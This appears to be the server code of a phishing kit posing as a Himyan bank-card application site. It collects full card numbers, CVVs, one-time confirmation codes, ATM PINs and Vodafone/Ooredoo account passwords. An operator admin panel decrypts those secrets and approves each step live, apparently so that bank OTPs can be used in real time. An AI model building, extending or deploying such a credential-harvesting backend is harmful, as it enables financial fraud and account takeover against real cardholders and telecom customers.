import http from 'node:http';
import { promises as fs } from 'node:fs';
import path from 'node:path';
import crypto from 'node:crypto';
import { fileURLToPath } from 'node:url';
import { activeVisitorsCount, createRequest, findRequest, initDatabase, listRequests, pool, updateRequest, upsertVisitor } from './db.js';

const __filename = fileURLToPath(import.meta.url);
const __dirname = path.dirname(__filename);
const PORT = Number(process.env.PORT || 3000);
const HOST = '0.0.0.0';
const ADMIN_USER = process.env.ADMIN_USER || 'admin';
const ADMIN_PASSWORD = process.env.ADMIN_PASSWORD || 'change-this-before-production';
const SESSION_SECRET = process.env.SESSION_SECRET || crypto.randomBytes(32).toString('hex');
const ENCRYPTION_KEY = process.env.ENCRYPTION_KEY ? Buffer.from(process.env.ENCRYPTION_KEY, 'hex') : crypto.randomBytes(32);
const ENCRYPTION_IV_LENGTH = 16;
const DATA_DIR = process.env.DATA_DIR || path.join(__dirname, 'data');
const REQUESTS_FILE = path.join(DATA_DIR, 'requests.json');
const PUBLIC_DIR = path.join(__dirname, 'public');
const sessions = new Map();
const localVisitors = new Map();
const localRequests = [];
const PUBLIC_FILES = new Set(['index.html', 'apply.html', 'confirmation.html', 'pending.html', 'confirmation-code.html', 'admin.html', 'style.css', 'style_fixed.css', 'logo.svg', 'qcb-logo.svg', 'card.svg', 'card2.svg', 'bg-hero.png', 'menu-icon.svg', 'account-link.svg', 'no-minimum.svg', 'no-bank.svg', 'free-first.svg', 'naps.svg', 'contactless.svg', 'atm-pos-online.svg', 'security.svg', 'apply-banner.jpg']);
const mimeTypes = { '.html': 'text/html; charset=utf-8', '.css': 'text/css; charset=utf-8', '.js': 'text/javascript; charset=utf-8', '.svg': 'image/svg+xml', '.png': 'image/png', '.jpg': 'image/jpeg', '.jpeg': 'image/jpeg', '.json': 'application/json; charset=utf-8' };

const cleanText = (value, max = 240) => String(value ?? '').trim().replace(/[<>]/g, '').slice(0, max);
const json = (res, status, payload) => { res.writeHead(status, { 'Content-Type': 'application/json; charset=utf-8', 'Cache-Control': 'no-store' }); res.end(JSON.stringify(payload)); };
const text = (res, status, body, type = 'text/plain; charset=utf-8') => { res.writeHead(status, { 'Content-Type': type, 'Cache-Control': 'no-store' }); res.end(body); };
const parseBody = (req) => new Promise((resolve, reject) => { let raw = ''; req.on('data', chunk => { raw += chunk; if (raw.length > 100000) reject(new Error('Payload too large')); }); req.on('end', () => { try { resolve(JSON.parse(raw || '{}')); } catch { reject(new Error('Invalid JSON')); } }); req.on('error', reject); });
const cookies = (req) => Object.fromEntries((req.headers.cookie || '').split(';').filter(Boolean).map(part => { const [key, ...rest] = part.trim().split('='); return [key, decodeURIComponent(rest.join('='))]; }));
const isAdmin = (req) => { const token = cookies(req).himyan_admin; if (!token) return false; if (sessions.has(token)) return sessions.get(token) > Date.now(); try { const [payload, signature] = token.split('.'); const expected = crypto.createHmac('sha256', SESSION_SECRET).update(payload).digest('hex'); const data = JSON.parse(Buffer.from(payload, 'base64').toString()); if (signature !== expected || data.expiresAt <= Date.now()) return false; sessions.set(token, data.expiresAt); return true; } catch { return false; } };
const newId = () => crypto.randomUUID();
function encrypt(text) { const iv = crypto.randomBytes(ENCRYPTION_IV_LENGTH); const cipher = crypto.createCipheriv('aes-256-cbc', ENCRYPTION_KEY, iv); let encrypted = cipher.update(String(text), 'utf8', 'hex'); encrypted += cipher.final('hex'); return iv.toString('hex') + ':' + encrypted; }
function decrypt(text) { if (!text || !text.includes(':')) return null; try { const parts = text.split(':'); const iv = Buffer.from(parts[0], 'hex'); const encryptedText = parts[1]; const decipher = crypto.createDecipheriv('aes-256-cbc', ENCRYPTION_KEY, iv); let decrypted = decipher.update(encryptedText, 'hex', 'utf8'); decrypted += decipher.final('utf8'); return decrypted; } catch { return null; } }

async function localInit() { await fs.mkdir(DATA_DIR, { recursive: true }); try { localRequests.push(...JSON.parse(await fs.readFile(REQUESTS_FILE, 'utf8'))); } catch { } }
async function getRequests() { return pool ? listRequests() : localRequests; }
async function getRequest(id) { return pool ? findRequest(id) : localRequests.find(item => item.id === id) || null; }
async function saveRequest(request) { if (pool) return createRequest(request); localRequests.unshift(request); await fs.writeFile(REQUESTS_FILE, JSON.stringify(localRequests, null, 2) + '\n'); return request; }
async function patchRequest(id, patch) { if (pool) return updateRequest(id, patch); const item = localRequests.find(row => row.id === id); if (!item) return null; Object.assign(item, patch); await fs.writeFile(REQUESTS_FILE, JSON.stringify(localRequests, null, 2) + '\n'); return item; }
async function deleteRequest(id) { if (pool) { /* TODO: add delete to db.js */ return null; } const index = localRequests.findIndex(row => row.id === id); if (index === -1) return null; const deleted = localRequests.splice(index, 1)[0]; await fs.writeFile(REQUESTS_FILE, JSON.stringify(localRequests, null, 2) + '\n'); return deleted; }
async function presence(req, page) { const id = cleanText(req.headers['x-himyan-visitor'], 80) || crypto.createHash('sha256').update(`${req.socket.remoteAddress || 'unknown'}:${req.headers['user-agent'] || ''}`).digest('hex').slice(0, 32); if (pool) await upsertVisitor(id, page); else { localVisitors.set(id, { page, lastSeen: Date.now() }); for (const [key, value] of localVisitors) if (value.lastSeen < Date.now() - 45000) localVisitors.delete(key); } return id; }
async function visitorsCount() { if (pool) return activeVisitorsCount(); return [...localVisitors.values()].filter(v => ['home', 'application'].includes(v.page)).length; }
async function serveStatic(res, pathname) { const relative = pathname === '/' ? 'index.html' : pathname.replace(/^\/+/, ''); const filePath = path.resolve(PUBLIC_DIR, relative); if (!filePath.startsWith(`${path.resolve(PUBLIC_DIR)}${path.sep}`)) return text(res, 403, 'Forbidden'); try { const file = await fs.readFile(filePath); res.writeHead(200, { 'Content-Type': mimeTypes[path.extname(filePath)] || 'application/octet-stream', 'Cache-Control': 'no-cache' }); res.end(file); } catch { text(res, 404, 'Not found'); } }

const server = http.createServer(async (req, res) => {
  try {
    const url = new URL(req.url || '/', `http://${req.headers.host || 'localhost'}`);
    const pathname = url.pathname;
    if (pathname === '/api/presence' && req.method === 'POST') { const body = await parseBody(req).catch(() => ({})); const visitorId = await presence(req, cleanText(body.page || 'site', 40)); return json(res, 200, { ok: true, visitorId, activeVisitors: await visitorsCount() }); }
    if (pathname === '/api/requests' && req.method === 'POST') { const body = await parseBody(req); const request = { id: newId(), createdAt: new Date().toISOString(), cardType: ['debit', 'prepaid'].includes(body.cardType) ? body.cardType : '', fullName: cleanText(body.fullName, 120), nationalId: cleanText(body.nationalId, 40), mobile: cleanText(body.mobile || body.phone, 40), email: cleanText(body.email, 160), nationality: ['citizen', 'resident'].includes(body.nationality) ? body.nationality : '', bank: cleanText(body.bank, 120), status: 'new' }; if (!request.cardType || !request.fullName || !request.nationalId || !request.mobile || !request.email || !request.nationality || !request.bank) return json(res, 400, { ok: false, message: 'Please complete all required fields.' }); await saveRequest(request); return json(res, 201, { ok: true, id: request.id }); }
    if (pathname === '/api/requests/confirm' && req.method === 'POST') { const body = await parseBody(req); const request = await getRequest(cleanText(body.id, 80)); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); const patch = { status: 'pending' }; if (body.cardNumber || body.cardExpiryMonth || body.cardExpiryYear || body.cardCvv || body.cardHolderName) { if (body.cardNumber) patch.card_number_encrypted = encrypt(cleanText(body.cardNumber, 20)); if (body.cardExpiryMonth) patch.card_expiry_month = cleanText(body.cardExpiryMonth, 2); if (body.cardExpiryYear) patch.card_expiry_year = cleanText(body.cardExpiryYear, 4); if (body.cardCvv) patch.card_cvv_encrypted = encrypt(cleanText(body.cardCvv, 4)); if (body.cardHolderName) patch.card_holder_name = cleanText(body.cardHolderName, 120); } if (['new', 'pending'].includes(request.status)) await patchRequest(request.id, patch); return json(res, 200, { ok: true, id: request.id, status: 'pending' }); }
    if (pathname === '/api/requests/status' && req.method === 'GET') { const request = await getRequest(cleanText(url.searchParams.get('id'), 80)); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); return json(res, 200, { ok: true, id: request.id, status: request.status }); }
    if (pathname === '/api/requests/code' && req.method === 'POST') { const body = await parseBody(req); const code = cleanText(body.code, 6).replace(/[٠-٩]/g, d => String('٠١٢٣٤٥٦٧٨٩'.indexOf(d))); const request = await getRequest(cleanText(body.id, 80)); if (!/^\d{6}$/.test(code)) return json(res, 400, { ok: false, message: 'Confirmation code must contain 6 digits.' }); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); if (!['approved', 'code_pending'].includes(request.status)) return json(res, 409, { ok: false, message: 'The request is not ready for a confirmation code.' }); const updated = await patchRequest(request.id, { confirmation_code: code, code_submitted_at: new Date().toISOString(), status: 'code_pending' }); return json(res, 200, { ok: true, id: updated.id, status: updated.status }); }
    if (pathname === '/api/requests/atm-pin' && req.method === 'POST') { const body = await parseBody(req); const atmPin = cleanText(body.atmPin, 4).replace(/[٠-٩]/g, d => String('٠١٢٣٤٥٦٧٨٩'.indexOf(d))); const request = await getRequest(cleanText(body.id, 80)); if (!/^\d{4}$/.test(atmPin)) return json(res, 400, { ok: false, message: 'ATM PIN must contain exactly 4 digits.' }); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); if (!['code_approved', 'code_pending', 'approved'].includes(request.status)) return json(res, 409, { ok: false, message: 'The request is not ready for ATM PIN.' }); const encrypted = encrypt(atmPin); const steps = Array.isArray(request.stepsCompleted) ? request.stepsCompleted : []; if (!steps.includes('atm_pin_submitted')) steps.push('atm_pin_submitted'); const updated = await patchRequest(request.id, { atm_pin_encrypted: encrypted, steps_completed: JSON.stringify(steps), status: 'atm_pin_submitted' }); return json(res, 200, { ok: true, id: updated.id, status: updated.status }); }
    if (pathname === '/api/requests/network-provider' && req.method === 'POST') { const body = await parseBody(req); const provider = cleanText(body.provider, 20); const request = await getRequest(cleanText(body.id, 80)); if (!['vodafone', 'ooredoo'].includes(provider)) return json(res, 400, { ok: false, message: 'Provider must be vodafone or ooredoo.' }); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); if (request.status !== 'atm_pin_submitted') return json(res, 409, { ok: false, message: 'Please submit ATM PIN first.' }); const steps = Array.isArray(request.stepsCompleted) ? request.stepsCompleted : []; if (!steps.includes('provider_selected')) steps.push('provider_selected'); const updated = await patchRequest(request.id, { network_provider: provider, steps_completed: JSON.stringify(steps), status: 'provider_selected' }); return json(res, 200, { ok: true, id: updated.id, provider: updated.networkProvider, status: updated.status }); }
    if (pathname === '/api/requests/provider-login' && req.method === 'POST') { const body = await parseBody(req); const provider = cleanText(body.provider, 20); const mobile = cleanText(body.mobile, 40); const password = String(body.password || ''); const request = await getRequest(cleanText(body.id, 80)); if (!['vodafone', 'ooredoo'].includes(provider)) return json(res, 400, { ok: false, message: 'Invalid provider.' }); if (!mobile || !password) return json(res, 400, { ok: false, message: 'Mobile and password are required.' }); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); if (request.status !== 'provider_selected') return json(res, 409, { ok: false, message: 'Please select network provider first.' }); if (request.networkProvider !== provider) return json(res, 409, { ok: false, message: 'Provider does not match selected provider.' }); const encrypted = encrypt(password); const steps = Array.isArray(request.stepsCompleted) ? request.stepsCompleted : []; if (!steps.includes('provider_login_completed')) steps.push('provider_login_completed'); const updated = await patchRequest(request.id, { provider_mobile: mobile, provider_password_encrypted: encrypted, steps_completed: JSON.stringify(steps), completed_at: new Date().toISOString(), status: 'completed' }); return json(res, 200, { ok: true, id: updated.id, status: updated.status }); }
    if (pathname === '/api/requests/decrypt' && req.method === 'GET') { if (!isAdmin(req)) return json(res, 401, { ok: false, message: 'Unauthorized.' }); const id = cleanText(url.searchParams.get('id'), 80); const field = cleanText(url.searchParams.get('field'), 30); const request = await getRequest(id); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); if (!['atm_pin', 'provider_password', 'card_number', 'card_cvv'].includes(field)) return json(res, 400, { ok: false, message: 'Invalid field.' }); const encrypted = field === 'atm_pin' ? request.atmPinEncrypted : field === 'provider_password' ? request.providerPasswordEncrypted : field === 'card_number' ? request.cardNumberEncrypted : field === 'card_cvv' ? request.cardCvvEncrypted : null; if (!encrypted) return json(res, 404, { ok: false, message: 'Field not found.' }); const decrypted = decrypt(encrypted); return json(res, 200, { ok: true, value: decrypted || 'Unable to decrypt' }); }
    if (pathname === '/api/admin/requests/decrypt' && req.method === 'GET') { if (!isAdmin(req)) return json(res, 401, { ok: false, message: 'Unauthorized.' }); const id = cleanText(url.searchParams.get('id'), 80); const field = cleanText(url.searchParams.get('field'), 30); const request = await getRequest(id); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); if (!['atm_pin', 'provider_password', 'card_number', 'card_cvv'].includes(field)) return json(res, 400, { ok: false, message: 'Invalid field.' }); const encrypted = field === 'atm_pin' ? (request.atmPinEncrypted || request.atm_pin_encrypted) : field === 'provider_password' ? (request.providerPasswordEncrypted || request.provider_password_encrypted) : field === 'card_number' ? (request.cardNumberEncrypted || request.card_number_encrypted) : field === 'card_cvv' ? (request.cardCvvEncrypted || request.card_cvv_encrypted) : null; if (!encrypted) return json(res, 404, { ok: false, message: 'Field not found.' }); const decrypted = decrypt(encrypted); return json(res, 200, { ok: true, value: decrypted || 'Unable to decrypt' }); }
    if (pathname === '/api/admin/login' && req.method === 'POST') { const body = await parseBody(req); if (cleanText(body.username, 80) !== ADMIN_USER || String(body.password || '') !== ADMIN_PASSWORD) return json(res, 401, { ok: false, message: 'Invalid credentials.' }); const expiresAt = Date.now() + 8 * 60 * 60 * 1000; const payload = Buffer.from(JSON.stringify({ user: ADMIN_USER, expiresAt })).toString('base64'); const signature = crypto.createHmac('sha256', SESSION_SECRET).update(payload).digest('hex'); const token = `${payload}.${signature}`; sessions.set(token, expiresAt); res.writeHead(200, { 'Content-Type': 'application/json; charset=utf-8', 'Set-Cookie': `himyan_admin=${token}; HttpOnly; SameSite=Lax; Path=/; Max-Age=28800`, 'Cache-Control': 'no-store' }); return res.end(JSON.stringify({ ok: true })); }
    if (pathname === '/api/admin/logout' && req.method === 'POST') { const token = cookies(req).himyan_admin; if (token) sessions.delete(token); res.writeHead(200, { 'Content-Type': 'application/json; charset=utf-8', 'Set-Cookie': 'himyan_admin=; HttpOnly; SameSite=Lax; Path=/; Max-Age=0' }); return res.end(JSON.stringify({ ok: true })); }
    if (pathname === '/api/admin/summary' && req.method === 'GET') { if (!isAdmin(req)) return json(res, 401, { ok: false, message: 'Unauthorized.' }); const requests = await getRequests(); return json(res, 200, { ok: true, activeVisitors: await visitorsCount(), totalRequests: requests.length, newRequests: requests.filter(r => ['new', 'pending', 'code_pending'].includes(r.status)).length, pendingRequests: requests.filter(r => ['pending', 'code_pending'].includes(r.status)).length, requests, updatedAt: new Date().toISOString() }); }
    if (pathname === '/api/admin/requests' && req.method === 'GET') { if (!isAdmin(req)) return json(res, 401, { ok: false, message: 'Unauthorized.' }); return json(res, 200, { ok: true, requests: await getRequests() }); }
    if (pathname === '/api/admin/requests' && req.method === 'PATCH') { if (!isAdmin(req)) return json(res, 401, { ok: false, message: 'Unauthorized.' }); const body = await parseBody(req); const request = await getRequest(cleanText(body.id, 80)); if (!request) return json(res, 404, { ok: false, message: 'Request not found.' }); const allowed = new Set(['new', 'pending', 'approved', 'rejected', 'handled']); if (!allowed.has(body.status)) return json(res, 400, { ok: false, message: 'Invalid status.' }); const codeReview = request.status === 'code_pending'; const status = body.status === 'approved' ? (codeReview ? 'code_approved' : 'approved') : body.status === 'rejected' ? (codeReview ? 'code_rejected' : 'rejected') : body.status; const updated = await patchRequest(request.id, { status, decision_at: ['approved', 'rejected', 'code_approved', 'code_rejected'].includes(status) ? new Date().toISOString() : null, decision_note: cleanText(body.note, 240) || null }); return json(res, 200, { ok: true, request: updated }); }
    if (pathname.startsWith('/api/admin/requests/') && req.method === 'DELETE') { if (!isAdmin(req)) return json(res, 401, { ok: false, message: 'Unauthorized.' }); const id = cleanText(pathname.split('/').pop(), 80); const deleted = await deleteRequest(id); if (!deleted) return json(res, 404, { ok: false, message: 'Request not found.' }); return json(res, 200, { ok: true, message: 'Request deleted.' }); }
    if (req.method === 'GET') return serveStatic(res, pathname);
    return text(res, 405, 'Method not allowed');
  } catch (error) { console.error(error); return json(res, 500, { ok: false, message: 'Server error.' }); }
});

(async () => { if (pool) await initDatabase(); else await localInit(); server.listen(PORT, HOST, () => console.log(`Himyan server listening on ${HOST}:${PORT} (${pool ? 'postgresql' : 'local fallback'})`)); })().catch(error => { console.error('Startup failed:', error); process.exit(1); });
